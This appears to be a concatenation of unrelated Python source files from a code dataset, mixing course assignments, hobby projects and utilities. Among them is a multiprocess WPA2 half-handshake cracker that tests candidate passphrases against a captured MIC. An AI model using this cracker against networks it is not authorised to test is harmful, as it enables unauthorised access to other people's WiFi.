'ename': ValueError.__name__,
'evalue': "unknwon value '{}'".format(line),
'traceback': '???'}
def magic_signed_rep(self, line):
"""
Convert all values to it's signed representation
Usage:
Just call this magic
`%signed`
"""
self.number_representation = 'signed'
def magic_unsigned_rep(self, line):
"""
All outputted values will be displayed with their unsigned representation
Usage:
Just call this magic
`%unsigned`
"""
self.number_representation = 'unsigned'
def magic_hex_rep(self, line):
"""
All outputed values will be displayed with their hexadecimal representation
Usage:
Just call this magic
`%hex`
"""
self.number_representation = 'hex'
def magic_register(self, line):
"""
Print out the current value of a register
Usage:
Pass in the register, or a list of registers separated by spaces
A list of registeres can be entered by separating them by a hyphen
`%reg R1`
or
`%reg R0 R5 R6`
or
`%reg R8-R12`
"""
message = ""
for reg in [i.strip() for i in line.replace(',', '').split()]:
if '-' in reg:
# We have a range (Rn-Rk)
r1, r2 = reg.split('-')
# TODO do we want to allow just numbers?
n1 = re.search(self.interpreter.REGISTER_REGEX, r1).groups()[0]
n2 = re.search(self.interpreter.REGISTER_REGEX, r2).groups()[0]
n1 = self.interpreter.convert_to_integer(n1)
n2 = self.interpreter.convert_to_integer(n2)
for i in range(n1, n2+1):
val = self.interpreter.register[r1[0] + str(i)]
val = self.convert_representation(val)
message += "{}: {}\n".format(r1[0] + str(i), val)
else:
val = self.interpreter.register[reg]
val = self.convert_representation(val)
message += "{}: {}\n".format(reg, val)
stream_content = {'name': 'stdout', 'text': message}
self.send_response(self.iopub_socket, 'stream', stream_content)
def magic_memory(self, line):
"""
Print out the current value of memory
Usage:
Pass in the byte of memory to read, separated by spaced
A list of memory contents can be entered by separating them by a hyphen
`%mem 4 5`
or
`%mem 8-12`
"""
# TODO add support for directives
message = ""
for address in [i.strip() for i in line.replace(',', '').split()]:
if '-' in address:
# We have a range (n-k)
m1, m2 = address.split('-')
n1 = re.search(self.interpreter.IMMEDIATE_NUMBER, m1).groups()[0]
n2 = re.search(self.interpreter.IMMEDIATE_NUMBER, m2).groups()[0]
n1 = self.interpreter.convert_to_integer(n1)
n2 = self.interpreter.convert_to_integer(n2)
for i in range(n1, n2 + 1):
val = self.interpreter.memory[i]
val = self.convert_representation(val)
message += "{}: {}\n".format(str(i), val)
else:
# TODO fix what is the key for memory (currently it's an int, but registers are strings, should it be the same?)
val = self.interpreter.memory[self.interpreter.convert_to_integer(address)]
val = self.convert_representation(val)
message += "{}: {}\n".format(address, val)
stream_content = {'name': 'stdout', 'text': message}
self.send_response(self.iopub_socket, 'stream', stream_content)
def magic_run(self, line):
"""
Run the current program
Usage:
Call with a numbe rto run that many steps,
or call with no arguments to run to the end of the current program
`%run`
or
`%run 1`
"""
i = float('inf')
if line.strip():
i = int(line)
try:
with warnings.catch_warnings(record=True) as w:
self.interpreter.run(i)
for warning_message in w:
# TODO should this be stdout or stderr
stream_content = {'name': 'stdout', 'text': 'Warning: ' + str(warning_message.message) + '\n'}
self.send_response(self.iopub_socket, 'stream', stream_content)
except iarm.exceptions.EndOfProgram as e:
f_name = self.interpreter.program[self.interpreter.register['PC'] - 1].__name__
f_name = f_name[:f_name.find('_')]
message = "Error in {}: ".format(f_name)
stream_content = {'name': 'stdout', 'text': message + str(e) + '\n'}
self.send_response(self.iopub_socket, 'stream', stream_content)
except Exception as e:
for err in e.args:
stream_content = {'name': 'stderr', 'text': str(err)}
self.send_response(self.iopub_socket, 'stream', stream_content)
return {'status': 'error',
'execution_count': self.execution_count,
'ename': type(e).__name__,
'evalue': str(e),
'traceback': '???'}
def magic_help(self, line):
"""
Print out the help for magics
Usage:
Call help with no arguments to list all magics,
or call it with a magic to print out it's help info.
`%help`
or
`%help run
"""
line = line.strip()
if not line:
for magic in self.magics:
stream_content = {'name': 'stdout', 'text': "%{}\n".format(magic)}
self.send_response(self.iopub_socket, 'stream', stream_content)
elif line in self.magics:
# its a magic
stream_content = {'name': 'stdout', 'text': "{}\n{}".format(line, self.magics[line].__doc__)}
self.send_response(self.iopub_socket, 'stream', stream_content)
elif line in self.interpreter.ops:
# it's an instruction
stream_content = {'name': 'stdout', 'text': "{}\n{}".format(line, self.interpreter.ops[line].__doc__)}
self.send_response(self.iopub_socket, 'stream', stream_content)
else:
stream_content = {'name': 'stderr', 'text': "'{}' not a known magic or instruction".format(line)}
self.send_response(self.iopub_socket, 'stream', stream_content)
# TODO add tab completion
# TODO add completeness (can be used to return the prompt back to the user in case of an error)
def run_magic(self, line):
# TODO allow magics at end of code block
# TODO allow more than one magic per block
if line.startswith('%'):
loc = line.find(' ')
params = ""
if loc > 0:
params = line[loc + 1:]
op = line[1:loc]
else:
op = line[1:]
return self.magics[op](params)
def run_code(self, code):
if not code:
return
try:
with warnings.catch_warnings(record=True) as w:
self.interpreter.evaluate(code)
for warning_message in w:
# TODO should this be stdout or stderr
stream_content = {'name': 'stdout', 'text': 'Warning: ' + str(warning_message.message) + '\n'}
self.send_response(self.iopub_socket, 'stream', stream_content)
except Exception as e:
for err in e.args:
stream_content = {'name': 'stderr', 'text': "{}\n{}".format(type(e).__name__, str(err))}
self.send_response(self.iopub_socket, 'stream', stream_content)
return {'status': 'error',
'execution_count': self.execution_count,
'ename': type(e).__name__,
'evalue': str(e),
'traceback': '???'}
def do_execute(self, code, silent, store_history=True,
user_expressions=None, allow_stdin=False):
instructions = ""
for line in code.split('\n'):
if line.startswith('%'):
# TODO run current code, run magic, then continue
ret = self.run_code(instructions)
if ret:
return ret
instructions = ""
ret = self.run_magic(line)
if ret:
return ret
else:
instructions += line + '\n'
ret = self.run_code(instructions)
if ret:
return ret
return {'status': 'ok',
'execution_count': self.execution_count,
'payload': [],
'user_expressions': {}
}
if __name__ == '__main__':
from ipykernel.kernelapp import IPKernelApp
IPKernelApp.launch_instance(kernel_class=ArmKernel)
| 37.748571 | 128 | 0.546776 |
aaecb8a64722e04f0363e0de885f9fecd7b99152 | 383 | py | Python | pyweb/com/xsqt/Student.py | zhougithui/python | fbac0b2508545083044eafde4bf6eb58d4606eb5 | [
"Apache-2.0"
] | null | null | null | pyweb/com/xsqt/Student.py | zhougithui/python | fbac0b2508545083044eafde4bf6eb58d4606eb5 | [
"Apache-2.0"
] | null | null | null | pyweb/com/xsqt/Student.py | zhougithui/python | fbac0b2508545083044eafde4bf6eb58d4606eb5 | [
"Apache-2.0"
] | null | null | null | #! /usr/bin/evn python
class Student(object):
__slots__ = ('__birth', '__age')
@property
def birth(self):
return self.__birth
@birth.setter
def birth(self, value):
self.__birth = value
@property
def age(self):
return 2015 - self.__birth
if __name__ == '__main__':
stu = Student()
stu.birth = 1991
print(stu.age)
| 15.958333 | 36 | 0.587467 |
aaee23ba02e2df2083e1a2d6aa2430790b04b2a3 | 35 | py | Python | src/utils/__init__.py | Columbine21/Hierarchical-Attention-Networks | 623840970cb302c7f74515ffff1560c0131b975e | [
"MIT"
] | 1 | 2021-03-15T02:45:28.000Z | 2021-03-15T02:45:28.000Z | src/utils/__init__.py | Columbine21/Hierarchical-Attention-Networks | 623840970cb302c7f74515ffff1560c0131b975e | [
"MIT"
] | null | null | null | src/utils/__init__.py | Columbine21/Hierarchical-Attention-Networks | 623840970cb302c7f74515ffff1560c0131b975e | [
"MIT"
] | null | null | null | from .vocab import gloveVocabulary
| 17.5 | 34 | 0.857143 |
aaf0aa3cbdbb1c81c191ac04d6a56e4b822a4b99 | 980 | py | Python | src/weapon.py | gcairesdev/zelda | 33fce4196c306d0a840aa189b0213f2879058090 | [
"MIT"
] | 2 | 2022-03-10T22:22:19.000Z | 2022-03-24T14:42:55.000Z | src/weapon.py | gcairesdev/zelda | 33fce4196c306d0a840aa189b0213f2879058090 | [
"MIT"
] | null | null | null | src/weapon.py | gcairesdev/zelda | 33fce4196c306d0a840aa189b0213f2879058090 | [
"MIT"
] | null | null | null | import pygame
class Weapon(pygame.sprite.Sprite):
def __init__(self, player, groups):
super().__init__(groups)
self.spriteType = 'weapon'
direction = player.status.split('_')[0]
# graphic
fullPath = f'./src/img/weapons/{player.weapon}/{direction}.png'
self.image = pygame.image.load(fullPath).convert_alpha()
# placement
if direction == 'right':
self.rect = self.image.get_rect(
midleft=player.rect.midright + pygame.math.Vector2(0, 16))
elif direction == 'left':
self.rect = self.image.get_rect(
midright=player.rect.midleft + pygame.math.Vector2(0, 16))
elif direction == 'down':
self.rect = self.image.get_rect(
midtop=player.rect.midbottom + pygame.math.Vector2(0, 0))
else:
self.rect = self.image.get_rect(
midbottom=player.rect.midtop + pygame.math.Vector2(-10, 0))
| 36.296296 | 75 | 0.586735 |
aaf11ccf2412c6e3efada30eaecd8bb0db6b297a | 3,052 | py | Python | Assignment1/initial/src/main/mp/utils/AST.py | jimcbl/ppl_hcmut_assignment | 7a06d61e4cda8c76f62a1da5b93ef66d98198b80 | [
"MIT"
] | 1 | 2019-11-27T13:41:07.000Z | 2019-11-27T13:41:07.000Z | Assignment1/initial/src/main/mp/utils/AST.py | jimodayne/ppl_hcmut_assignment | 7a06d61e4cda8c76f62a1da5b93ef66d98198b80 | [
"MIT"
] | null | null | null | Assignment1/initial/src/main/mp/utils/AST.py | jimodayne/ppl_hcmut_assignment | 7a06d61e4cda8c76f62a1da5b93ef66d98198b80 | [
"MIT"
] | 1 | 2019-12-03T05:33:13.000Z | 2019-12-03T05:33:13.000Z | from abc import ABC, abstractmethod, ABCMeta
from Visitor import Visitor
class AST(ABC):
def __eq__(self, other):
return self.__dict__ == other.__dict__
@abstractmethod
def accept(self, v, param):
return v.visit(self, param)
class Program(AST):
#decl:list(Decl)
def __init__(self, decl):
self.decl = decl
def __str__(self):
return "Program(List(" + ','.join(str(i) for i in self.decl) + "))"
def accept(self, v: Visitor, param):
return v.visitProgram(self, param)
class Decl(AST):
__metaclass__ = ABCMeta
pass
class FuncDecl(Decl):
#name: Id
#param: list(VarDecl)
#returnType: Type
#body: Block
def __init__(self, name, param, returnType, body):
self.name = name
self.param = param
self.returnType = returnType
self.body = body
def __str__(self):
return "FuncDecl(" + str(self.name) + ",List(" + ','.join(str(i) for i in self.param) + ")," + str(self.returnType) + "," + str(self.body) + ")"
def accept(self, v, param):
return v.visitFuncDecl(self, param)
class Type(AST):
__metaclass__ = ABCMeta
pass
class IntType(Type):
def __str__(self):
return "IntType"
def accept(self, v, param):
return v.visitIntType(self, param)
class VoidType(Type):
def __str__(self):
return "VoidType"
def accept(self, v, param):
return v.visitVoidType(self, param)
class Stmt(AST):
__metaclass__ = ABCMeta
pass
class Expr(Stmt):
__metaclass__ = ABCMeta
pass
class CallExpr(Expr):
#method:Id
#param:list(Expr)
def __init__(self, method, param):
self.method = method
self.param = param
def __str__(self):
return "CallExpr(" + str(self.method) + ",List(" + ','.join(str(i) for i in self.param) + "))"
def accept(self, v, param):
return v.visitCallExpr(self, param)
class LHS(Expr):
__metaclass__ = ABCMeta
pass
class Id(LHS):
#name:string
def __init__(self, name):
self.name = name
def __str__(self):
return "Id(" + self.name + ")"
def accept(self, v, param):
return v.visitId(self, param)
class Block(Stmt):
#decl:list(VarDecl)
#stmt:list(Stmt)
def __init__(self, decl, stmt):
self.decl = decl
self.stmt = stmt
def __str__(self):
return "Block(List(" + ','.join(str(i) for i in self.decl) + "),List(" + ','.join(str(i) for i in self.stmt) + "))"
def accept(self, v, param):
return v.visitBlock(self, param)
class Literal(Expr):
__metaclass__ = ABCMeta
pass
class IntLiteral(Literal):
#value:int
def __init__(self, value):
self.value = value
def __str__(self):
return "IntLiteral(" + str(self.value) + ")"
def accept(self, v, param):
return v.visitIntLiteral(self, param)
| 23.476923 | 154 | 0.572412 |
aaf368c0cbb0ab66f42b16908ff73d7af84048da | 1,224 | py | Python | humans-in-the-loop-files/machine-learning-scripts/ImageDownloader.py | LibraryOfCongress/hitl | 8b054f1433b2129bfbaf16fcb09df637335a04a0 | [
"MIT"
] | 3 | 2021-12-06T16:44:16.000Z | 2022-03-30T05:45:48.000Z | humans-in-the-loop-files/machine-learning-scripts/ImageDownloader.py | LibraryOfCongress/hitl | 8b054f1433b2129bfbaf16fcb09df637335a04a0 | [
"MIT"
] | 8 | 2022-02-14T22:39:19.000Z | 2022-03-31T01:54:06.000Z | humans-in-the-loop-files/machine-learning-scripts/ImageDownloader.py | LibraryOfCongress/hitl | 8b054f1433b2129bfbaf16fcb09df637335a04a0 | [
"MIT"
] | 1 | 2022-02-15T18:59:44.000Z | 2022-02-15T18:59:44.000Z | #
# Download images from the LOC IIIF server and store them locally
#
import requests
from pathlib import Path
import shutil
import time
base = 'https://www.loc.gov/'
iiifbase = 'https://tile.loc.gov/image-services/iiif/'
def getImages(item, dest_dir):
downloaded_images = list()
Path(dest_dir).mkdir(parents=True, exist_ok=True)
imagenum = item['start']
while imagenum <= item['end']:
imgurl = iiifbase + item['service'].format(str(imagenum).zfill(4))
r = requests.get(imgurl, stream=True)
if r.status_code == 200:
imgname = item['lc_id'] + '_' + str(imagenum).zfill(4) + '.jpg'
imgpath = dest_dir + '/' + imgname
image_info = {
"image_name": imgname,
"image_location": dest_dir,
"source": imgurl,
"image_url": "https://www.loc.gov/resource/{}/?sp={}".format(item['lc_id'], str(imagenum).zfill(4)).replace("gdcustel", "usteledirec")
}
downloaded_images.append(image_info)
with open(imgpath, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
time.sleep(1)
imagenum += 1
print(imgurl)
return downloaded_images | 36 | 146 | 0.607843 |
aaf4cca94bb840d24c6ed43cf92a6175ba126324 | 1,291 | py | Python | Task2E.py | bendomb/IA-Flood-Warning-System | 8e476010e83b64aca8a05dc31f88fe2d6fbd3c9f | [
"MIT"
] | null | null | null | Task2E.py | bendomb/IA-Flood-Warning-System | 8e476010e83b64aca8a05dc31f88fe2d6fbd3c9f | [
"MIT"
] | null | null | null | Task2E.py | bendomb/IA-Flood-Warning-System | 8e476010e83b64aca8a05dc31f88fe2d6fbd3c9f | [
"MIT"
] | null | null | null | from floodsystem.datafetcher import fetch_measure_levels
from floodsystem.stationdata import build_station_list, update_water_levels
import floodsystem.flood as flood
import floodsystem.plot as plot
from datetime import datetime, timedelta
import datetime
stations = build_station_list()
update_water_levels(stations)
# plots the water levels over the past 10 days for the 5 stations at which the current relative water level is greatest.
def run():
"""Requirements for Task 2E"""
# makes a list of the 5 stations with the highest relative water level in descending order
top_five = flood.stations_highest_rel_level(stations, 5)
for i in range(5):
station_name = top_five[i][0].name
station_check = None
for station in stations:
if station.name == station_name:
station_check = station
break
if not station_check:
print("Station {} could not be found".format(station_name))
dt = 10
dates, levels = fetch_measure_levels(station_check.measure_id, dt = datetime.timedelta(days=dt))
plot.plot_water_levels(station, dates, levels)
if __name__ == "__main__":
print("*** Task 2E: CUED Part IA Flood Warning System ***")
run()
| 32.275 | 120 | 0.691712 |
aaf7c70154f36b59a8bb5810940a58d3ac7062c0 | 2,007 | py | Python | cracker.py | alin-dinescu/WPA2-HalfHandshake-Crack | fc8e31dd0e34c3ac9c7e95fceb222a4212bd1342 | [
"OpenSSL",
"MIT"
] | null | null | null | cracker.py | alin-dinescu/WPA2-HalfHandshake-Crack | fc8e31dd0e34c3ac9c7e95fceb222a4212bd1342 | [
"OpenSSL",
"MIT"
] | null | null | null | cracker.py | alin-dinescu/WPA2-HalfHandshake-Crack | fc8e31dd0e34c3ac9c7e95fceb222a4212bd1342 | [
"OpenSSL",
"MIT"
] | null | null | null | import hmac, hashlib, binascii
from hashlib import sha1
from binascii import a2b_hex, b2a_hex, unhexlify
from pbkdf2_ctypes import pbkdf2_bin
from multiprocessing import Pool, Queue, cpu_count
from datetime import datetime
from time import sleep
numOfPs = cpu_count()
def hmac4times(ptk, pke):
tempPke = pke
r = ''
for i in range(4):
r += hmac.new(ptk, pke + chr(i), sha1).digest()
return r
def crackProcess(ssid, clientMac, APMac, Anonce, Snonce, mic, data, passQueue, foundPassQ):
pke = "Pairwise key expansion" + '\x00' + min(APMac, clientMac) + max(APMac, clientMac) + min(Anonce, Snonce) + max(Anonce, Snonce)
count = 0
timeA = datetime.now()
while True:
passPhrase = passQueue.get()
pmk = pbkdf2_bin(passPhrase, ssid, 4096, 32)
ptk = hmac4times(pmk, pke)
if ord(data[6]) & 0b00000010 == 2:
calculatedMic = hmac.new(ptk[0:16], data, sha1).digest()[0:16]
else:
calculatedMic = hmac.new(ptk[0:16], data).digest()
if mic == calculatedMic:
foundPassQ.put(passPhrase)
def crack(ssid, clientMac, APMac, Anonce, Snonce, mic, data, passQueue):
foundPassQ = Queue()
try:
timeA = datetime.now()
startSize = passQueue.qsize()
except:
pass
pool = Pool(numOfPs, crackProcess, (ssid, clientMac, APMac, Anonce, Snonce, mic, data, passQueue, foundPassQ))
while True:
sleep(1)
try:
timeB = datetime.now()
currentSize = passQueue.qsize()
print str(100 - 100.0 * currentSize / startSize) + "% done. " + str((startSize - currentSize) / (timeB - timeA).total_seconds()) + " hashes per second"
except:
pass
if foundPassQ.empty():
if passQueue.empty():
returnVal = False
break
else:
passphrase = foundPassQ.get()
returnVal = passphrase
break
pool.terminate()
return returnVal
| 33.45 | 163 | 0.605879 |
aaf844dccdd148febc58c248704051fea8ef7efb | 1,256 | py | Python | gui_components/cell.py | FilipRistic2922/SudokuPy | 7098530d2fd9d82cc2e66649c993630ef6e5774a | [
"MIT"
] | null | null | null | gui_components/cell.py | FilipRistic2922/SudokuPy | 7098530d2fd9d82cc2e66649c993630ef6e5774a | [
"MIT"
] | null | null | null | gui_components/cell.py | FilipRistic2922/SudokuPy | 7098530d2fd9d82cc2e66649c993630ef6e5774a | [
"MIT"
] | null | null | null | import pygame
from gui_components.gui_util import get_font, BLACK, BLUE, GRAY
class Cell:
def __init__(self, value, row, col, width, height):
self.value = value
self.temp = 0
self.row = row
self.col = col
self.width = width
self.height = height
self.set_by_user = False
self.selected = False
def draw(self, win):
font = get_font("arial", 40)
gap = self.width / 9
x = self.col * gap
y = self.row * gap
if self.temp != 0 and self.value == 0:
text = font.render(str(self.temp), 1, GRAY)
win.blit(text, (x + 45, y + 5))
elif not (self.value == 0):
color = BLACK
if self.set_by_user:
color = BLUE
text = font.render(str(self.value), 1, color)
win.blit(text, (x + (gap / 2 - text.get_width() / 2), y + (gap / 2 - text.get_height() / 2)))
if self.selected:
pygame.draw.rect(win, BLUE, (x, y, gap, gap), 5)
def set_value(self, val, set_by_user: bool = False):
self.value = val
self.temp = 0
self.set_by_user = set_by_user
def set_temp(self, val):
self.value = 0
self.temp = val
| 27.304348 | 105 | 0.527866 |
aaf88ec65f719215938c906b09236be307dd6034 | 2,246 | py | Python | chapter2/remove_dups.py | MubashirullahD/cracking-the-coding-interview | f9595886967e7c63cec19028239e4289e9cd1f9e | [
"MIT"
] | 1 | 2021-12-01T13:26:10.000Z | 2021-12-01T13:26:10.000Z | chapter2/remove_dups.py | MubashirullahD/cracking-the-coding-interview | f9595886967e7c63cec19028239e4289e9cd1f9e | [
"MIT"
] | null | null | null | chapter2/remove_dups.py | MubashirullahD/cracking-the-coding-interview | f9595886967e7c63cec19028239e4289e9cd1f9e | [
"MIT"
] | null | null | null | """
Remove Dups: Write code to remove duplicates from an unsorted linked list.
FOLLOW UP
How would you solve this problem if a temporary buffer is not allowed?
"""
from linkedlist import linkedlist
def remove_dup(linked_list):
placeholder = dict()
pointer1 = linked_list.top # This guy deletes the dublicate nodes
pointer2 = linked_list.top.next # This guy finds the nodes to delete
if pointer2 is None: # Only one variable
return
placeholder[pointer1.data] = 1
while(pointer2.next is not None):
placeholder[pointer2.data] = placeholder.get(pointer2.data, 0) + 1
if placeholder[pointer2.data] > 1:
pointer1.next = pointer2.next
pointer2 = pointer2.next
else:
pointer1 = pointer2
pointer2 = pointer2.next
# Last node case
placeholder[pointer2.data] = placeholder.get(pointer2.data, 0) + 1
if placeholder[pointer2.data] > 1:
pointer1.next = pointer2.next
def _sort(linked_list):
#bubble sort
sorted = False
while(not sorted):
node = linked_list.top
sorted = True
while(node.next is not None):
if node.data > node.next.data:
sorted = False
tmp = node.data
node.data = node.next.data
node.next.data = tmp
node = node.next
def remove_dub_no_buff(linked_list):
# We may have to sort
_sort(linked_list)
pointer1 = linked_list.top
while (pointer1.next is not None):
if (pointer1.data == pointer1.next.data):
pointer1.next = pointer1.next.next
else:
pointer1 = pointer1.next
if __name__ == "__main__":
test_list = linkedlist(10)
test_list.top.append_to_tail(20)
test_list.top.append_to_tail(30)
test_list.top.append_to_tail(20) #
test_list.top.append_to_tail(40)
test_list.top.append_to_tail(20) #
test_list.top.append_to_tail(50)
test_list.top.append_to_tail(40) #
test_list.top.append_to_tail(50) #
print("Before removing ")
test_list.print_all()
remove_dub_no_buff(test_list)
print("After removing ")
test_list.print_all()
| 27.060241 | 77 | 0.629564 |
aaf93a0fc8d0fd36a7282b6699c6daddec972081 | 1,172 | py | Python | examples/sample.py | odra/habet | cb791c3367f06fff0a6557fe5697033b2262bfc8 | [
"MIT"
] | null | null | null | examples/sample.py | odra/habet | cb791c3367f06fff0a6557fe5697033b2262bfc8 | [
"MIT"
] | null | null | null | examples/sample.py | odra/habet | cb791c3367f06fff0a6557fe5697033b2262bfc8 | [
"MIT"
] | null | null | null | # -*- encoding: utf-8 -*-
import sys
sys.path.append('../')
from habet import Application, Response, Handler, errors
import json
#custom error register
class InvalidJSONError(errors.BaseServerError):
def __init__(self, *args, **kwargs):
super(InvalidJSONError, self).__init__(*args, **kwargs)
self.status = 400
self.code = -32005
self.message = 'Invalid JSON'
#root handler
class RootHandler(Handler):
def get(self):
return Response(body={'action': 'new'})
#name handler
class NameHandler(Handler):
def set_default_headers(self):
self.default_headers = {
'X-Custom-Header': 'My header',
'Content-Type': 'application/json'
}
def get(self):
return Response(body={'name': self.request.params['name']})
def post(self):
try:
body = json.loads(self.request.body)
except (TypeError, ValueError):
raise InvalidJSONError()
return Response(body=body)
def finish(self):
print app.some_var
print 'log stuff'
#application setup
app = Application(some_var='my var')
app.route('/', RootHandler)
app.route('/{name}', NameHandler)
#run app
if __name__ == '__main__':
app.listen()
| 21.309091 | 63 | 0.672355 |
aafaed7bd2fdeb1c2bbe286e7b1293532edfc8c8 | 2,516 | py | Python | api/models.py | mz-techops/banhammer | 02476db3d2bb617dbe50827687065fbea7553caf | [
"BSD-3-Clause"
] | 3 | 2018-03-09T23:29:25.000Z | 2020-11-25T15:34:13.000Z | api/models.py | whyallyn/banhammer | 59fc81b15d9950a7a40279a9d1df8101c58df569 | [
"BSD-3-Clause"
] | 3 | 2018-05-08T01:10:43.000Z | 2021-03-19T21:56:36.000Z | api/models.py | whyallyn/banhammer | 59fc81b15d9950a7a40279a9d1df8101c58df569 | [
"BSD-3-Clause"
] | 2 | 2018-05-10T15:07:24.000Z | 2018-06-20T16:24:00.000Z | """API Django models."""
from __future__ import unicode_literals
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Target(models.Model):
"""Definition of a Target."""
BAN = 'ban'
ALLOW = 'allow'
TARGET_ACTION_CHOICES = (
(BAN, "Ban"),
(ALLOW, "Allow"),
)
target_action = models.CharField(
max_length=5,
choices=TARGET_ACTION_CHOICES,
)
IPADDR = 'ip'
DOMAIN = 'domain'
URL = 'url'
HASH = 'hash'
USER = 'user'
TARGET_TYPE_CHOICES = (
(IPADDR, 'IP Address'),
(DOMAIN, 'Domain'),
(URL, 'URL'),
(HASH, 'Hash'),
(USER, 'User'),
)
target_type = models.CharField(
max_length=6,
choices=TARGET_TYPE_CHOICES,
)
target = models.CharField(max_length=900)
reason = models.CharField(max_length=50)
method = models.CharField(max_length=50)
user = models.CharField(max_length=255)
date_created = models.DateTimeField(auto_now_add=True)
last_modified = models.DateTimeField(auto_now=True)
class Meta:
permissions = (
('target_all_read', 'Read access for all Target types'),
('target_all_write', 'Write access for all Target types'),
('target_ipaddr_read', 'Read access for IP Target types'),
('target_ipaddr_write', 'Write access for IP Target types'),
('target_domain_read', 'Read access for Domain Target types'),
('target_domain_write', 'Write access for Domain Target types'),
('target_url_read', 'Read access for URL Target types'),
('target_url_write', 'Write access for URL Target types'),
('target_hash_read', 'Read access for Hash Target types'),
('target_hash_write', 'Write access for Hash Target types'),
('target_user_read', 'Read access for User Target types'),
('target_user_write', 'Write access for User Target types'),
)
def __str__(self):
return self.target
@python_2_unicode_compatible
class TargetIpAddr(models.Model):
"""Definition of an IP Address Target."""
ipaddr = models.CharField(max_length=45, unique=True)
ipaddr_action = models.CharField(
max_length=5,
choices=Target.TARGET_ACTION_CHOICES,
)
target = models.ManyToManyField(Target)
method = models.CharField(max_length=50)
def __str__(self):
return self.ipaddr
| 31.848101 | 76 | 0.636328 |
aafb1cf5d24f222fa6f06ff100c89a778fe48350 | 179 | py | Python | accounts/urls.py | Julmgc/Course-Organizer | b383f2845474314186a2ac6589885af890889da8 | [
"MIT"
] | null | null | null | accounts/urls.py | Julmgc/Course-Organizer | b383f2845474314186a2ac6589885af890889da8 | [
"MIT"
] | null | null | null | accounts/urls.py | Julmgc/Course-Organizer | b383f2845474314186a2ac6589885af890889da8 | [
"MIT"
] | null | null | null | from django.urls import path
from .views import UserLogin, UserRegister
urlpatterns = [
path("accounts/", UserRegister.as_view()),
path("login/", UserLogin.as_view()),
]
| 22.375 | 46 | 0.709497 |
aafb2505abc576fb91ec98a082757451092677b3 | 1,795 | py | Python | src/ranking_utils/scripts/preprocess.py | fknauf/ranking-utils | ce1a0be4e560d5f156a76cb5c0e3751793c67648 | [
"MIT"
] | null | null | null | src/ranking_utils/scripts/preprocess.py | fknauf/ranking-utils | ce1a0be4e560d5f156a76cb5c0e3751793c67648 | [
"MIT"
] | null | null | null | src/ranking_utils/scripts/preprocess.py | fknauf/ranking-utils | ce1a0be4e560d5f156a76cb5c0e3751793c67648 | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
import argparse
from pathlib import Path
from pytorch_lightning import seed_everything
from ranking_utils.datasets.antique import ANTIQUE
from ranking_utils.datasets.fiqa import FiQA
from ranking_utils.datasets.insuranceqa import InsuranceQA
from ranking_utils.datasets.trecdl import TRECDL2019Passage, TRECDL2019Document
from ranking_utils.datasets.trec import TREC
def main():
ap = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
ap.add_argument("SAVE", help="Where to save the results")
ap.add_argument(
"--num_neg_point",
type=int,
default=1,
help="Number of negatives per positive (pointwise training)",
)
ap.add_argument(
"--num_neg_pair",
type=int,
default=16,
help="Number of negatives per positive (pairwise training)",
)
ap.add_argument(
"--query_limit_pair",
type=int,
default=64,
help="Maximum number of training examples per query (pairwise training)",
)
ap.add_argument("--random_seed", type=int, default=123, help="Random seed")
subparsers = ap.add_subparsers(help="Choose a dataset", dest="dataset")
subparsers.required = True
DATASETS = [ANTIQUE, FiQA, InsuranceQA, TRECDL2019Passage, TRECDL2019Document, TREC]
for c in DATASETS:
c.add_subparser(subparsers, c.__name__.lower())
args = ap.parse_args()
if args.random_seed:
seed_everything(args.random_seed)
ds = None
for c in DATASETS:
if args.dataset == c.__name__.lower():
ds = c(args)
break
save_path = Path(args.SAVE)
ds.save(save_path, args.num_neg_point, args.num_neg_pair, args.query_limit_pair)
if __name__ == "__main__":
main()
| 29.42623 | 88 | 0.690808 |
aafc4992c92b83ce538e9440118f026965da7bbf | 6,158 | py | Python | camshot.py | corerd/camshot | b85787a27eac97ed6c9617203aab0e0a62a4960a | [
"MIT"
] | 1 | 2020-06-14T11:01:34.000Z | 2020-06-14T11:01:34.000Z | camshot.py | corerd/camshot | b85787a27eac97ed6c9617203aab0e0a62a4960a | [
"MIT"
] | null | null | null | camshot.py | corerd/camshot | b85787a27eac97ed6c9617203aab0e0a62a4960a | [
"MIT"
] | null | null | null | #!/usr/bin/python
#
# The MIT License (MIT)
#
# Copyright (c) 2014 Corrado Ubezio
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from camshotcfg import ConfigDataLoad
from camgrab import imageCapture
from camshotlog import logInit, logAppend
from cloud import sync_with_cloud, check_and_reset_network_connection
from shutdown import shutdown, suspend, hasPrivilegesToShutdown
from daylight import DaylightRepeatingEvent
from time import time, sleep
from datetime import datetime
from sys import argv, exit
from os import makedirs, path
# Globals
DEFAULT_CONFIG_FILE = 'camshotcfg.json'
APPLICATION_NAME = 'Camera Shot'
MAIN_SCRIPT_NAME = 'camshot.py'
# Configuration parameter defaults
WORKING_DIR = '.'
TIME_BEFORE_SHUTDOWN = 1 #minutes
TIME_ELAPSED_BETWEEN_SHOTS = 5*60 #seconds
TIME_DAYLIGHT_BEGIN = '0 8 * * 1-5' # cron like format: 08:00 from Monday to Friday
TIME_DAYLIGHT_END = '30 18 * * 1-5' # cron like format: 18:30 from Monday to Friday
SUSPEND_TO_MEMORY = False
CAMERAS_LIST = []
class CamShotError(Exception):
def __init__(self, emesg):
self.emesg = emesg
def __str__(self):
return "{0}".format(self.emesg)
def configUpdate(cfgFile):
